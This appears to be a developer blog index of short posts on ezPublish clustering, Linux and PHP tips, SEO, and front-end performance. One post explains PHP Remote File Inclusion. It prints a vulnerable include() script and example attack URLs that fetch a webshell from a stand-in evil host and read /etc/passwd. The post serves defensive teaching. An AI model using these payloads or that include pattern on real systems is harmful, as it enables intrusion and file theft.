ezPublish 4.3 - admin panel js/css after clustering with eZDBFileHandler

If you have ezPublish 4.3 installation in clustering with eZDBFileHandler  you'll see that CSS and Javascript files does not get served properly for Admin site. If you check the network request logs, it shows a 404 error. After lot of debugging and search , I found that there is something wrong in ezdbfile database table. Script "clusterize.php" does not update the datatype for admin css and js files properly.

Firefox is able to overcome this problem and just serves them correctly, but Chrome , IE and Safari will just download the file on the desktop, thus preventing it from rendering correctly.

To solve this problem you need to do manual update for datatype for those records. Replace the datatype as "text/css" and "text/javascript" for those records.

UPDATE ezdbfile SET datatype = 'text/css' WHERE name LIKE '%/cache/public/stylesheets/%';
UPDATE ezdbfile SET datatype = 'text/javascript' WHERE name LIKE '%/cache/public/javascript/%';

Read More

Linux command - find large size files

We often come across problems like disk utilization 100%. In such situation, there is need to know the files which are occupying large amount of disk space. So to find out such files e.g. in this case files having size greater than 50 MB in current directory, command will be as follows:

find . -type f -size +50000k -exec ls -lh {} \; | awk '{ print $9 ": " $5 }'

enjoy !!

Read More

Zend Framework - Bootstrap optimization quick step

I am using zend framework 1.11.11 in one of my application. I have written different _init methods in bootstrap to inilialize seesion,  database connection, loading navigation, view helpers etc.  It worked well initially when traffic to site is low. Afterwords i found that it is affecting performance. So I combined all things under one _init method.


class Bootstrap extends Zend_Application_Bootstrap_Bootstrap {


protected function _initApp() {


$moduleLoader = new Zend_Application_Module_Autoloader(array(
'namespace' => '',
'basePath' => APPLICATION_PATH));
               }

                 ## DB initialization ####
                 ## Zend_Registry::set ####
                 ## SMTP initialization ####

}

Read More

Quick SEO Tips : Interlinking

Inter-Linking pages:

• Do not Focus only on Home Page
• User proper Anchor Texts : Anchor Texts are the hyperlinked texts which link pages Avoid using generic texts like “Click Here” to optimize your page. Also ensure that your anchor texts are short and precise.
• Avoid too many Anchor Texts: Too much of anything is bad. Too many anchor texts distracts the visitor. Concentrate on certain well thought of keyword rich anchor text for your pages.
• Go for Absolute Links instead of Relative Links: Absolute Links ensure that pages pull each other up in Search Engine Result Pages.
• Proper Navigation across site: The closer the page is from the Home Page, the more importance search engines give to the page. Ensure that your most important pages are in close proximity to the Home Page.

Read More

Tip - Page load time improvement

Here is a quick tip to reduce the page load time.

As you know for each HTTP request there happens three-way handshake. So if you are fetching content from external objects and showing on  page, it will be quite helpful to turn on HTTP keepalives for external objects. Otherwise you add an extra round-trip to do another TCP three-way handshake and slow-start for every HTTP request. If you are worried about hitting global server connection limits, set the keepalive timeout to something short, like 5-10 seconds. Also look into serving your static content from a different webserver than your dynamic content. Having thousands of connections open to a stripped down static file webserver can happen in like 10 megs of RAM total, whereas your main webserver might easily eat 10 megs of RAM per connection.

Read More

Browser rendering optimization

Use efficient CSS selectors 

1. Avoid a universal key selector.

Allow elements to inherit from ancestors, or use a class to apply a style to multiple elements.

2. Make your rules as specific as possible.

Prefer class and ID selectors over tag selectors.

3. Remove redundant qualifiers.

These qualifiers are redundant:

·         ID selectors qualified by class and/or tag selectors

·         Class selectors qualified by tag selectors (when a class is only used for one tag, which is a good design practice anyway).

4. Avoid using descendant selectors, especially those that specify redundant ancestors.

For example, the rule body ul li a {...} specifies a redundant body selector, since all elements are descendants of the body tag.

5. Use class selectors instead of descendant selectors.

For example, if you need two different styles for an ordered list item and an ordered list item, instead of using two rules:

ul li {color: blue;}
ol li {color: red;}

You could encode the styles into two class names and use those in your rules; e.g:

.unordered-list-item {color: blue;}
.ordered-list-item {color: red;}

If you must use descendant selectors, prefer child selectors, which at least only require evaluation of one additional node, not all the intermediate nodes up to an ancestor.

6. Avoid the :hover pseudo-selector for non-link elements for IE clients.

If you use :hover on non-anchor elements, test the page in IE7 and IE8 to be sure your page is usable.   If you find that :hover is causing performance issues, consider conditionally using a JavaScript onmouseover event handler for IE clients.

In my next post I will explain the more techniques .. So stay tune....

Read More

DHTMLX - Ajax-enabled JavaScript grid control

dhtmlxGrid is an Ajax-enabled JavaScript grid control with cutting-edge functionality, powerful data binding, and excellent performance with large datasets. The component is easy-to-use and provides great flexibility due to its rich client-side API. dhtmlxGrid supports different datasources (XML, JSON, CSV, JavaScript array, and HTML table), and can be also loaded from custom XML format if needed.

More info

Read More

How to avoid RFI vulnerability in PHP.

What is RFI?
Remote File Inclusion (RFI) is a type of vulnerability. It allows an attacker to include a remote file, usually through a script on the web server.
In PHP there are functions available like "include" and "require" to include the files in current executing script. The vulnerability occurs due to the use of user-supplied input without proper validation.

Example
Consider below script
<?php
   $file = 'file1';
   if (isset( $_GET['FILE'] ) )
      $file = $_GET['FILE'];
   include( $file . '.php' );
?>
<html>
<body>
<form method="get">
   <input type="checkbox" name="FILE" value="file1"> File 1
   <input type="checkbox" name="FILE" value="file1"> File 2
   <input type="submit">
</form>
</body>
</html>

The developer intended only file1.php and file2.php to be used as options. But as anyone can easily insert arbitrary values in FILE, it is possible to inject code from files:

• /vulnerable.php?FILE=http://evil.example.com/webshell.txt? - injects a remotely hosted file containing a malicious code.
• /vulnerable.php?FILE=C:\\ftp\\upload\\exploit - Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability)
• /vulnerable.php?FILE=C:\\notes.txt - example using NUL meta character to remove the .php suffix, allowing access to files other than .php. (With magic_quotes_gpc enabled this limits the attack by escaping special characters, this disables the use of the NUL terminator)
• /vulnerable.php?FILE=/etc/passwd - allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.

I think this information will help PHP programmers to handle RFI vulnerability at some extent.

Read More

Lithium, the most RAD framework for PHP 5.3+

Lithium, the most RAD framework for PHP 5.3+ is focused on quality, speed, and flexibility. It's a set of no-nonsense philosophies and tools that enable you to build better applications, in less time, without sacrificing quality or extensibility.
Lithium understands distributed storage and caching, queuing systems, micro-dispatch frameworks, with integrated support for document oriented databases like CouchDB and MongoDB, alongside relational databases like MySQL and PostgreSQL.
Lithium's architecture allows you to get your application up and running quickly, and still allows you to take control of the framework to support the requirements of your application.

Check this out for more info

Read More